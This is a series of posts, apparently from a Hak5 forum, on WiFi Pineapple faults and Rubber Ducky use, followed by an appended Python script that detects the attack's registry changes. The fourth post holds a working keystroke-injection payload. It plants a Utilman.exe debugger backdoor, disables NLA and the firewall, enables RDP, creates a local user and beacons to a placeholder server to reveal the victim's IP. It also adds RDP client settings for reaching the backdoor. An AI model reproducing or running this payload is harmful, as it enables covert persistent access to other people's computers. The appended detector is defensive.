RUdude

  1. Hi, it seems I've burned and then bricked my Pineapple. Bad experience to share. Hardware problem? Here are the symptoms: the Ethernet ports do not work at all or work in an unknown way; I need to do a couple of strange things to make them work from time to time, but it seems the controller was burned via ESD. I am not sure if there was a static discharge to the device, but I do not see any other reason, as this worked before. I tried to configure the eth0 and eth1 adapters out of the bridge, the same problem. Also, according to Wireshark (I've connected the Pineapple to a PC directly), it seems the RX line of the Pineapple is not working; dmesg says something about this. A firmware change does not help. Here is some output: The message "br-lan: received packet on eth0 with own address as source address" repeats all the time while eth0 is up. When I issued 'ifconfig eth0 down' it seems the Pineapple is working (was working.. oh..) About the brick now :) After this I commented out the lan interface configuration within the /etc/config/network file to make the device work only via Wireless and 3G, but I commented out the IP address also, stupid mistake, I forgot I have no console, too much of a hurry.. Any comments please? I already ordered a USB-UART and it seems I will order a new Pineapple or AP121U. Earlier there was NOT such a problem, Ethernet was working flawlessly, it happened unexpectedly.
  2. Hi guys, http://cloud.wifipineapple.com is not working, I wonder if someone will be so kind and fix this. Thanks!
  3. Anyway victim should be, it does not depend on Rubber Ducky, as this is only a HID device like a keyboard. If the current user does not have admin privileges (is not included in the Administrators group) you will never run any program with administrator rights, as the administrator password will be requested (MENU -> DOWN -> DOWN -> ENTER -> LEFT -> ENTER)
  4. Hi there, just want to share some experience of a workaround for different locales when using exploits like utilman https://github.com/h...utilman-exploit and creating a local user with administrator rights. The main problem is that the current firmware does not support the Russian language (and many others), so it is impossible to change file ownership or add a newly created user to the admins group, as for example in a localized Windows version the Administrators group name is also localized (_Administratory_) (unfortunately this forum does not accept RU chars and I can use Russian word here), so commands like these will never work [CODE]STRING icacls "%systemroot%\System32\Utilman.exe" /grant _Administratory_:F /T[/CODE] [CODE]STRING net localgroup _Administratory_ Local000 /add[/CODE] The post of [b]PCFreak[/b] is amazing http://forums.hak5.o...ouching-a-file/ and this helped me a lot to make such a workaround. As there is very restricted time while injecting the victim computer, especially if you will not have physical access to this PC later, here Terminal Services is also used for getting full access. The idea is to add a local user with restricted rights + the utilman hack 'by PCFreak', and then remotely run cmd.exe using the "Ease of Access" button at the logon screen and promote to Admins. After the inject the script makes an HTTP request to a specified server using powershell, so you may easily find its IP address in the webserver logfile. Sure, this will work only for real IP addresses, but not with fake or NAT. Windows 7 example, ANY localization, but the default keyboard input locale should be US-English anyway, unfortunately. So before injecting try to check or change this. I do not know a workaround here, let's discover together?
[CODE] DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 MENU DELAY 1000 DOWN DELAY 200 DOWN DELAY 200 ENTER DELAY 1000 LEFT DELAY 200 ENTER DELAY 200 ENTER STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f ENTER DELAY 200 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f ENTER DELAY 200 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 1 /f ENTER DELAY 200 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 200 STRING netsh firewall set opmode disable ENTER DELAY 200 STRING net user Local000 /add ENTER DELAY 200 STRING net user Local000 * ENTER DELAY 200 STRING password ENTER DELAY 200 STRING password ENTER DELAY 200 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://_server_IP_address/injected_host.html','%TEMP%\~tmp932.txt'); ENTER DELAY 200 STRING exit ENTER [/CODE] This script also enables Terminal Services with old clients compartibility (without NLA) mode and disables Windows Firewall. For connection to remote logon screen from NLA-enabled MSTSC clients like in Windows 7 you also need some client side modification, otherwise username and password will be requested before connection to server and you never will be able to see Logon screen and will not be able to use EoA-button. To resolve this issue you need to save empty RDP file and edit this using any editor like notepad.exe, these params should be changed/added: [CODE] authentication level:i:0 enablecredsspsupport:i:0 [/CODE] After this modification save file and connect to server, you will go directly to Logon screen. 
Give admin rights to your new user and after this you'll be able to log in remotely (and locally, sure) --- BTW, another locale problem is that fast keys (underlined chars in menu items) in the Start menu or right-button menu are also localized, for this reason I am not using these like [CODE]MENU STRING a[/CODE] instead of this I select the menu item using cursor keys [CODE] MENU DELAY 1000 DOWN DELAY 200 DOWN DELAY 200 ENTER [/CODE] I hope it will be helpful for someone. PS: this script will also work within a Terminal Services session, so you will also be able to inject a remote PC using a local USB port, usually it is connected to the session on the remote side (only fullscreen mode). Regards from Russia :)
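
A defender-side check for the registry changes made by the script in post 4, added here as an example and not part of RUdude's post: it parses the decoded text of a reg export file and flags a Debugger value under Image File Execution Options for Utilman.exe, UserAuthentication set to 0 and fDenyTSConnections set to 0. The parser, the extension of the check to other accessibility binaries and the sample export are assumptions constructed for this example.

```python
import re

# Logon-screen accessibility binaries. The post targets Utilman.exe; the others
# are added here as a generalisation of the same Debugger check.
ACCESSIBILITY = {"utilman.exe", "sethc.exe", "osk.exe", "magnify.exe",
                 "narrator.exe", "displayswitch.exe", "atbroker.exe"}
IFEO = (r"hkey_local_machine\software\microsoft\windows nt\currentversion"
        r"\image file execution options" + "\\")
TS = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
RDP_TCP = TS + r"\winstations\rdp-tcp"

def parse_reg(text):
    """Parse decoded .reg export text into {key: {value_name: value}}, lower-cased."""
    keys, current = {}, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
            continue
        m = re.fullmatch(r'"(.+?)"=(.+)', line)
        if m and current is not None:
            name, raw = m.group(1).lower(), m.group(2)
            if raw.startswith("dword:"):
                current[name] = int(raw[6:], 16)
            else:  # string value: drop quotes, unescape backslashes
                current[name] = raw.strip('"').replace("\\\\", "\\")
    return keys

def audit(text):
    """Return findings for the settings the posted script changes."""
    findings = []
    for key, values in parse_reg(text).items():
        image = key[len(IFEO):] if key.startswith(IFEO) else None
        if image in ACCESSIBILITY and "debugger" in values:
            findings.append(f"IFEO Debugger on {image}: {values['debugger']}")
        if key == RDP_TCP and values.get("userauthentication") == 0:
            findings.append("RDP-Tcp UserAuthentication=0 (NLA disabled)")
        if key == TS and values.get("fdenytsconnections") == 0:
            findings.append("fDenyTSConnections=0 (RDP enabled, review if unexpected)")
    return findings

# Constructed sample export (not from a real host).
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe]
"Debugger"="cmd.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"UserAuthentication"=dword:00000000
'''
print("\n".join(audit(SAMPLE)))
```

Real reg export files are UTF-16 encoded, so decode them before passing the text to audit().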